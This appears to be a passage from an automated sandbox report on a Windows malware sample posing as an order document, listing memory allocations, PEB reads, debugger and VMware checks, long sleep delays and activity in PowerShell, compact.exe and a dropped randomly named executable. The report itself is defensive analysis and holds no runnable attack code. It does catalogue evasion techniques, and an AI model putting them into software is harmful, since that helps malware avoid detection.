            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: B90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 2860000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 4860000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 7810000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 8810000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 89C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 99C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: 9D20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: AD20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: BD20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: D1D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: E1D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: F1D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: F890000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Code function: 6_2_017E096E rdtsc 6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6637Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1546Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 9805Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\compact.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe TID: 4148Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep count: 168 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep time: -336000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep count: 9805 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 4776Thread sleep time: -19610000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708Thread sleep time: -52500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe TID: 2708Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DDC170 FindFirstFileW,FindNextFileW,FindClose,12_2_02DDC170
            Source: compact.exe, 0000000C.00000002.4556356627.000000000310D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq'V
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4561520155.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
            Source: firefox.exe, 0000000F.00000002.2820631900.0000016826ABC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DC9000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\compact.exe, Process queried: DebugPort
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00417B13 LdrLoadDll,6_2_00417B13
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE284 mov eax, dword ptr fs:[00000030h]6_2_017DE284
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE284 mov eax, dword ptr fs:[00000030h]6_2_017DE284
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D656A mov eax, dword ptr fs:[00000030h]6_2_017D656A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D656A mov eax, dword ptr fs:[00000030h]6_2_017D656A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D656A mov eax, dword ptr fs:[00000030h]6_2_017D656A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018205A7 mov eax, dword ptr fs:[00000030h]6_2_018205A7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018205A7 mov eax, dword ptr fs:[00000030h]6_2_018205A7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018205A7 mov eax, dword ptr fs:[00000030h]6_2_018205A7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8550 mov eax, dword ptr fs:[00000030h]6_2_017A8550
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8550 mov eax, dword ptr fs:[00000030h]6_2_017A8550
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836500 mov eax, dword ptr fs:[00000030h]6_2_01836500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC5ED mov eax, dword ptr fs:[00000030h]6_2_017DC5ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC5ED mov eax, dword ptr fs:[00000030h]6_2_017DC5ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A25E0 mov eax, dword ptr fs:[00000030h]6_2_017A25E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A65D0 mov eax, dword ptr fs:[00000030h]6_2_017A65D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA5D0 mov eax, dword ptr fs:[00000030h]6_2_017DA5D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA5D0 mov eax, dword ptr fs:[00000030h]6_2_017DA5D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE5CF mov eax, dword ptr fs:[00000030h]6_2_017DE5CF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE5CF mov eax, dword ptr fs:[00000030h]6_2_017DE5CF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C45B1 mov eax, dword ptr fs:[00000030h]6_2_017C45B1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C45B1 mov eax, dword ptr fs:[00000030h]6_2_017C45B1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE59C mov eax, dword ptr fs:[00000030h]6_2_017DE59C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D4588 mov eax, dword ptr fs:[00000030h]6_2_017D4588
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2582 mov eax, dword ptr fs:[00000030h]6_2_017A2582
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2582 mov ecx, dword ptr fs:[00000030h]6_2_017A2582
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CA470 mov eax, dword ptr fs:[00000030h]6_2_017CA470
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CA470 mov eax, dword ptr fs:[00000030h]6_2_017CA470
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CA470 mov eax, dword ptr fs:[00000030h]6_2_017CA470
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185A49A mov eax, dword ptr fs:[00000030h]6_2_0185A49A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179645D mov eax, dword ptr fs:[00000030h]6_2_0179645D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C245A mov eax, dword ptr fs:[00000030h]6_2_017C245A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182A4B0 mov eax, dword ptr fs:[00000030h]6_2_0182A4B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA430 mov eax, dword ptr fs:[00000030h]6_2_017DA430
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E420 mov eax, dword ptr fs:[00000030h]6_2_0179E420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E420 mov eax, dword ptr fs:[00000030h]6_2_0179E420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E420 mov eax, dword ptr fs:[00000030h]6_2_0179E420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179C427 mov eax, dword ptr fs:[00000030h]6_2_0179C427
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8402 mov eax, dword ptr fs:[00000030h]6_2_017D8402
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8402 mov eax, dword ptr fs:[00000030h]6_2_017D8402
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8402 mov eax, dword ptr fs:[00000030h]6_2_017D8402
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A04E5 mov ecx, dword ptr fs:[00000030h]6_2_017A04E5
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D44B0 mov ecx, dword ptr fs:[00000030h]6_2_017D44B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A64AB mov eax, dword ptr fs:[00000030h]6_2_017A64AB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185A456 mov eax, dword ptr fs:[00000030h]6_2_0185A456
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C460 mov ecx, dword ptr fs:[00000030h]6_2_0182C460
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8770 mov eax, dword ptr fs:[00000030h]6_2_017A8770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184678E mov eax, dword ptr fs:[00000030h]6_2_0184678E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018547A0 mov eax, dword ptr fs:[00000030h]6_2_018547A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0750 mov eax, dword ptr fs:[00000030h]6_2_017A0750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2750 mov eax, dword ptr fs:[00000030h]6_2_017E2750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2750 mov eax, dword ptr fs:[00000030h]6_2_017E2750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D674D mov esi, dword ptr fs:[00000030h]6_2_017D674D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D674D mov eax, dword ptr fs:[00000030h]6_2_017D674D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D674D mov eax, dword ptr fs:[00000030h]6_2_017D674D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D273C mov eax, dword ptr fs:[00000030h]6_2_017D273C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D273C mov ecx, dword ptr fs:[00000030h]6_2_017D273C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D273C mov eax, dword ptr fs:[00000030h]6_2_017D273C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018207C3 mov eax, dword ptr fs:[00000030h]6_2_018207C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC720 mov eax, dword ptr fs:[00000030h]6_2_017DC720
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC720 mov eax, dword ptr fs:[00000030h]6_2_017DC720
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E7E1 mov eax, dword ptr fs:[00000030h]6_2_0182E7E1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0710 mov eax, dword ptr fs:[00000030h]6_2_017A0710
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D0710 mov eax, dword ptr fs:[00000030h]6_2_017D0710
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC700 mov eax, dword ptr fs:[00000030h]6_2_017DC700
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A47FB mov eax, dword ptr fs:[00000030h]6_2_017A47FB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A47FB mov eax, dword ptr fs:[00000030h]6_2_017A47FB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C27ED mov eax, dword ptr fs:[00000030h]6_2_017C27ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C27ED mov eax, dword ptr fs:[00000030h]6_2_017C27ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C27ED mov eax, dword ptr fs:[00000030h]6_2_017C27ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181C730 mov eax, dword ptr fs:[00000030h]6_2_0181C730
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AC7C0 mov eax, dword ptr fs:[00000030h]6_2_017AC7C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A07AF mov eax, dword ptr fs:[00000030h]6_2_017A07AF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01824755 mov eax, dword ptr fs:[00000030h]6_2_01824755
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E75D mov eax, dword ptr fs:[00000030h]6_2_0182E75D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D2674 mov eax, dword ptr fs:[00000030h]6_2_017D2674
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA660 mov eax, dword ptr fs:[00000030h]6_2_017DA660
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA660 mov eax, dword ptr fs:[00000030h]6_2_017DA660
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BC640 mov eax, dword ptr fs:[00000030h]6_2_017BC640
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A262C mov eax, dword ptr fs:[00000030h]6_2_017A262C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE627 mov eax, dword ptr fs:[00000030h]6_2_017BE627
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D6620 mov eax, dword ptr fs:[00000030h]6_2_017D6620
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8620 mov eax, dword ptr fs:[00000030h]6_2_017D8620
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2619 mov eax, dword ptr fs:[00000030h]6_2_017E2619
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
